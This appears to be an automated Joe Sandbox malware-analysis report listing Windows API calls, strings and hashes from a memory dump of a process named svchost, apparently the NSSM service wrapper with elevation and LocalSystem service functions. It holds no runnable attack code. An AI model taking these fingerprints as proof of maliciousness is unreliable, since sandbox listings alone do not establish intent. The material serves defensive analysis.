                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • GetProcessHeap.KERNEL32(00000000,0000FFFE), ref: 00406B48
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00406B4B
                                                    • __snwprintf_s.LIBCMT ref: 00406B81
                                                    • __snwprintf_s.LIBCMT ref: 00406BA5
                                                      • Part of subcall function 00405370: GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
                                                      • Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
                                                      • Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
                                                      • Part of subcall function 00405370: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
                                                      • Part of subcall function 00405370: HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
                                                      • Part of subcall function 00405370: __snwprintf_s.LIBCMT ref: 004053DC
                                                    • GetOpenFileNameW.COMDLG32(?,00000200), ref: 00406BD6
                                                    • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00406C03
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00406C1A
                                                    • HeapFree.KERNEL32(00000000), ref: 00406C1D
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00406C2A
                                                    • HeapFree.KERNEL32(00000000), ref: 00406C2D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process__snwprintf_s$AllocFreeMessage$Format_memset$DefaultFileLangLocalNameOpenSendUser__vsnwprintf_s_l
                                                    • String ID: :%s:$X
                                                    • API String ID: 4223584720-3643568712
                                                    • Opcode ID: 6f6cb0b89cacafe10d1f1f8fd1946d6e639445887778fbb56b134f867ee11a65
                                                    • Instruction ID: 2fb1f1ec6dd78cf9b56019ed523e1d5e6dfd49e8e4e2ad70138c12666923ebb1
                                                    • Opcode Fuzzy Hash: 6f6cb0b89cacafe10d1f1f8fd1946d6e639445887778fbb56b134f867ee11a65
                                                    • Instruction Fuzzy Hash: 725103B1A043016BE610EB24CC45FAB77A8EF84754F140A3DFD55A73C1DB78E914CA9A
                                                    APIs
                                                      • Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
                                                      • Part of subcall function 00405470: LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00405498
                                                    • _memset.LIBCMT ref: 004099BD
                                                    • GetProcessHeap.KERNEL32 ref: 004099E2
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004099EB
                                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 00409A28
                                                    • GetProcessHeap.KERNEL32(00000008,0000FFFE), ref: 00409A35
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00409A38
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00409A46
                                                    • HeapFree.KERNEL32(00000000), ref: 00409A49
                                                    • GetCommandLineW.KERNEL32 ref: 00409A5B
                                                    • __snwprintf_s.LIBCMT ref: 00409A6F
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • ShellExecuteExW.SHELL32 ref: 00409AD9
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00409AED
                                                    • HeapFree.KERNEL32(00000000), ref: 00409AF6
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409AFB
                                                    • HeapFree.KERNEL32(00000000), ref: 00409AFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Alloc$CommandExecuteFileLineLocalModuleNameShell__snwprintf_s__vsnwprintf_s_l_memset_vfwprintf
                                                    • String ID: <$GetCommandLine()$GetModuleFileName()$elevate()
                                                    • API String ID: 973368859-4193039769
                                                    • Opcode ID: 900e8c87ca2aa9aec742fd558df0281ba4947d5c9c9fdbed743180e08cd3c412
                                                    • Instruction ID: 7ae2c759de92c54c39a002a946b74eb1e22cb2beefd2f70ccc6c30d9fe699ef8
                                                    • Opcode Fuzzy Hash: 900e8c87ca2aa9aec742fd558df0281ba4947d5c9c9fdbed743180e08cd3c412
                                                    • Instruction Fuzzy Hash: 673128F1E043027AD310ABA5CC46FA77798EF84704F00452AF945E72C1DBBCE9448BA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SeServiceLogonRight
                                                    • API String ID: 0-347471591
                                                    • Opcode ID: d1ec01c29beff1dc2b7cf4a31634801e6b38091671ebd8c69d5d4f8db8eefe16
                                                    • Instruction ID: 1588cd9aa28459d6f698114f179f5034525e64d227a869bba66d549dab2bd090
                                                    • Opcode Fuzzy Hash: d1ec01c29beff1dc2b7cf4a31634801e6b38091671ebd8c69d5d4f8db8eefe16
                                                    • Instruction Fuzzy Hash: D751D9F29003016BC210FB659C82A9F73A9EFC4758F44493EF845D3262E63CDA55C7AA
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: QueryValue
                                                    • String ID: All$affinity$setting_get_affinity
                                                    • API String ID: 3660427363-3501811323
                                                    • Opcode ID: aadf3678ba3ec564ff7923484b1f3c659c44b9ba2d0e62d742e643e475440171
                                                    • Instruction ID: 39c13d5f00e9b419edd27a44e9b0f75dfecbdf5c9278ee4873767282b9cc75a7
                                                    • Opcode Fuzzy Hash: aadf3678ba3ec564ff7923484b1f3c659c44b9ba2d0e62d742e643e475440171
                                                    • Instruction Fuzzy Hash: 7041C9B1B042007BE600A779DC45FAF77DCEFC4729F840A5AF558D22D1D6B8DC848A66
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b78011fbee3aa40aefb94b04e9307e1ddbd925d910803d0c7f55a23a13cb692
                                                    • Instruction ID: 4a1410ef1443eea10fe89477afcc143de1e533fa6ee3b316fa2d910530bd4db7
                                                    • Opcode Fuzzy Hash: 1b78011fbee3aa40aefb94b04e9307e1ddbd925d910803d0c7f55a23a13cb692
                                                    • Instruction Fuzzy Hash: 4661DCB1A84302BBE101A7509C06FFB7398EB94B44F01443AF7527A0C2DBBC56558BAF
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9B8
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D9BB
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9E3
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D9E6
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9F5
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D9F8
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA07
                                                    • HeapFree.KERNEL32(00000000), ref: 0040DA0A
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA19
                                                    • HeapFree.KERNEL32(00000000), ref: 0040DA1C
                                                    • CloseServiceHandle.ADVAPI32(?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA29
                                                    • CloseHandle.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA41
                                                    • UnregisterWait.KERNEL32(?), ref: 0040DA4E
                                                    • DeleteCriticalSection.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA64
                                                    • CloseHandle.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA75
                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA83
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA8C
                                                    • HeapFree.KERNEL32(00000000), ref: 0040DA8F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Free$Process$CloseHandle$CriticalDeleteEnvironmentSectionServiceStringsUnregisterWait
                                                    • String ID:
                                                    • API String ID: 223489879-0
                                                    • Opcode ID: 115bcf30406b6ff842ec37e1375dc7df3e087b6a23b02530f15371c741b9abf6
                                                    • Instruction ID: 77dd6ce9f9945231fd51557c9ffd4fac1d491a87d3cf4fd6406c7136dc2c8fa9
                                                    • Opcode Fuzzy Hash: 115bcf30406b6ff842ec37e1375dc7df3e087b6a23b02530f15371c741b9abf6
                                                    • Instruction Fuzzy Hash: 5E3112F1F04701ABE7209BB6DC45FA7B7DCAF44745F054929BA59E3280CA78EC048A38
                                                    APIs
                                                    • QueryServiceConfig2W.ADVAPI32(00000000,00000001,00000000,00000000,00003FFF,00000000,00008418,00000402), ref: 0040D547
                                                    • GetLastError.KERNEL32 ref: 0040D549
                                                    • GetProcessHeap.KERNEL32(00000000,00003FFF,00000000,00000000), ref: 0040D567
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040D56A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocConfig2ErrorLastProcessQueryService
                                                    • String ID: SERVICE_CONFIG_DESCRIPTION$get_service_description()
                                                    • API String ID: 2527037045-119971955
                                                    • Opcode ID: 9949ae250d6f60cbc6c2d3ad254c89fe22e4bd7663aaf79f323aa80c9ae87168
                                                    • Instruction ID: 3e5ba4e39e1bc183658cdb8e0b0057f10ea9e025a726a76105c97a4cff3da096
                                                    • Opcode Fuzzy Hash: 9949ae250d6f60cbc6c2d3ad254c89fe22e4bd7663aaf79f323aa80c9ae87168
                                                    • Instruction Fuzzy Hash: 103137F2A413017BE200A7A6EC46FEBB35CDF95729F10052AF509E61C1DAB9D840866A
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00410980
                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00410987
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Process$AffinityCurrentMask
                                                    • String ID: All
                                                    • API String ID: 1231390398-55916349
                                                    • Opcode ID: 3cc79894fb783cbacc77b87bc96894dd0151df03ecdf7f3147d36d3e41e83904
                                                    • Instruction ID: 4f50b5df6772471c36ec06a59c3137138f5c5bb65052f92276dbeda9fd140f86
                                                    • Opcode Fuzzy Hash: 3cc79894fb783cbacc77b87bc96894dd0151df03ecdf7f3147d36d3e41e83904
                                                    • Instruction Fuzzy Hash: 0371E5B29043016BD710DF69DC85AAB77E8EFC4358F444A2EF944D3341E678ED848B6A
                                                    APIs
                                                    • GetSystemTime.KERNEL32(?), ref: 004089E3
                                                    • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,00000080,00000000), ref: 004089F8
                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 00408A0E
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00408A32
                                                    • CloseHandle.KERNEL32(00000000), ref: 00408A49
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00408A5D
                                                    • CompareFileTime.KERNEL32(?,?,?,00000000,FF676980,000000FF), ref: 00408A90
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408AD6
                                                    • MoveFileW.KERNEL32(?,?), ref: 00408AF7
                                                    • GetLastError.KERNEL32 ref: 00408B1D
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00408B54
                                                    • GetLastError.KERNEL32 ref: 00408B5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$ErrorHandleLast$CloseCompareCreateInformationMove
                                                    • String ID: CreateFile()$MoveFile()
                                                    • API String ID: 1279283993-2404744241
                                                    • Opcode ID: 25552cb11b5ace56ecd3b2e5a937ca093c4a3363743169b4a7c3585eb8c3d0c6
                                                    • Instruction ID: dbd175fc6890c416a4f9d1aeb2e25f209b5034f3b8b6a35462ec3c9fcbbef7c3
                                                    • Opcode Fuzzy Hash: 25552cb11b5ace56ecd3b2e5a937ca093c4a3363743169b4a7c3585eb8c3d0c6
                                                    • Instruction Fuzzy Hash: 7951B2B1604300AFD321DF50DD85EEF77A8FF88704F44492EF6C992181DB78A9448B6A
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 00410665
                                                    • RegDeleteValueW.ADVAPI32(00000000,?), ref: 00410678
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00410681
                                                    • __snwprintf_s.LIBCMT ref: 004106E3
                                                    • __wcsnicmp.LIBCMT ref: 0041070C
                                                    • _fwprintf.LIBCMT ref: 0041075F
                                                    • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,?), ref: 004107D2
                                                    • GetLastError.KERNEL32(?,?), ref: 004107DC
                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00410809
                                                    • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00410815
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Close$Value__snwprintf_s$DeleteErrorLast__wcsnicmp_fwprintf
                                                    • String ID: %s$default
                                                    • API String ID: 3151773479-387093873
                                                    • Opcode ID: a3eb8f7cbf097436222cf15ca32937873149e64d54cf7f047a34555ee42af66f
                                                    • Instruction ID: 30a3df3cfbea9975472b600d8026b2d659796aa5a5751022936202a7496980d0
                                                    • Opcode Fuzzy Hash: a3eb8f7cbf097436222cf15ca32937873149e64d54cf7f047a34555ee42af66f
                                                    • Instruction Fuzzy Hash: 5F613BB1A043006BD210AB65DD46FEB73989F84308F44452AF95592282F7FCE9D5CAAE
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040ECD9
                                                    • ChangeServiceConfigW.ADVAPI32(?,?,?,000000FF,00000000,00000000,00000000,0041E5D8,?,00000000,?,?,?,00000000), ref: 0040ED79
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 0040ED8E
                                                    • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040ED95
                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 0040ED9B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$ChangeConfigErrorFreeLastProcessService__snwprintf_s
                                                    • String ID: LocalSystem
                                                    • API String ID: 3404593348-3718507506
                                                    • Opcode ID: 41f063981e1366348621d5f49daee988617f9f6c866f27ec98b904e9930f1709
                                                    • Instruction ID: 6c351189403f5eb6c5fe8513cea9cc0aa6b3904080e0031a5e5be75d4344df1b
                                                    • Opcode Fuzzy Hash: 41f063981e1366348621d5f49daee988617f9f6c866f27ec98b904e9930f1709
                                                    • Instruction Fuzzy Hash: 9071ECF1904701ABE720DB65DC49FA773A8EF84308F048D3EF559A22C1E778E8558769
                                                    APIs
                                                      • Part of subcall function 0040D950: GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
                                                      • Part of subcall function 0040D950: HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F
                                                    • __snwprintf_s.LIBCMT ref: 004100BB
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • RegisterServiceCtrlHandlerExW.ADVAPI32(NSSM,0040F310,00000000), ref: 0041016B
                                                    • GetLastError.KERNEL32(00000000), ref: 0041017C
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$HeapRegisterSource$AllocCtrlDeregisterErrorHandlerLastProcessReportService__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: NSSM$service->name$service_main()
                                                    • API String ID: 4131733493-2082882489
                                                    • Opcode ID: 6ac95fc9643b6a64bb1cb5c6de92dade781988db5d66d8b08e3ebf056326ab07
                                                    • Instruction ID: 09d4c8929dcbfacbdd4c1d483c8683e469f37797597802ee5f3465e219f8d35a
                                                    • Opcode Fuzzy Hash: 6ac95fc9643b6a64bb1cb5c6de92dade781988db5d66d8b08e3ebf056326ab07
                                                    • Instruction Fuzzy Hash: 3851A8F1E40700EFD320AF759C46BD77BA8AB44319F40853FF65E96242D2BD68848B69
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041219F
                                                    • HeapFree.KERNEL32(00000000), ref: 004121A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID: %s$LocalSystem$SERVICE_INTERACTIVE_PROCESS$SERVICE_WIN32_OWN_PROCESS
                                                    • API String ID: 3859560861-1492594695
                                                    • Opcode ID: 33fa03d751a25fb42394721696a2fbae633dc317f90b51ed7800875141e1fc40
                                                    • Instruction ID: ce946582b93cb946955dea2ec205cb75b91bbb2897729394130ecaaa05bb3734
                                                    • Opcode Fuzzy Hash: 33fa03d751a25fb42394721696a2fbae633dc317f90b51ed7800875141e1fc40
                                                    • Instruction Fuzzy Hash: E231C3B3D4420137E6006676BC4AFDB73089F51339F140627F924E62C2FAB9DCD186A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ErrorOpenPolicyStatus
                                                    • String ID: lsa_canon$username_sid
                                                    • API String ID: 3835286460-3440772048
                                                    • Opcode ID: 4be24f8c859b4fd8f73fde33ddbbb5feb2b1e283fdf2ddda045c7394c8cdc431
                                                    • Instruction ID: c21e6304ed427eea8d7a4b8d0c36af05136f334d03c0e194f28452d20308fd16
                                                    • Opcode Fuzzy Hash: 4be24f8c859b4fd8f73fde33ddbbb5feb2b1e283fdf2ddda045c7394c8cdc431
                                                    • Instruction Fuzzy Hash: C641E3B59042017BD300FB69CC96DAB73E9FFC4708F44881EF58897252E678D99487A6
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,771AE010,?), ref: 0040EA3B
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040EA42
                                                    • __snwprintf_s.LIBCMT ref: 0040EA5C
                                                    • __snwprintf_s.LIBCMT ref: 0040EA83
                                                    • SetServiceStatus.ADVAPI32(?,?), ref: 0040EADA
                                                    • __snwprintf_s.LIBCMT ref: 0040EAF3
                                                    • __snwprintf_s.LIBCMT ref: 0040EB07
                                                    • WaitForSingleObject.KERNEL32(?,?), ref: 0040EB40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_s$Heap$AllocObjectProcessServiceSingleStatusWait
                                                    • String ID: %lu$%s()
                                                    • API String ID: 3479796768-699940799
                                                    • Opcode ID: e71cb8d17e41331fe53131b87f854323c29ecb78752b37c52de2a023a38e2165
                                                    • Instruction ID: 89c68062588a5b6a5dcd3b42c23b9f1343587bb4bcf2e221744147efb473305d
